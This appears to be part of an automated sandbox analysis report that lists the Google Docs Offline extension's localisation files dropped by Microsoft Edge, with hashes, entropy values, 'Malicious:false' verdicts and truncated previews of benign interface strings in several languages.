                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):935
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                      MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                      SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                      SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                      SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1065
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                      MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                      SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                      SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                      SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2771
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                      MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                      SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                      SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                      SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):858
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                      MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                      SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                      SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                      SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):954
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                      MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                      SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                      SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                      SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):899
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                      MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                      SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                      SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                      SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2230
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                      MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                      SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                      SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                      SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1160
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                      MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                      SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                      SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                      SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):3264
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                      MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                      SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                      SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                      SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):3235
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                      MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                      SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                      SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                      SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):3122
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                      MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                      SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                      SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                      SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1895
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                      MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                      SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                      SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                      SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1042
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                      MD5:F3E59EEEB007144EA26306C20E04C292
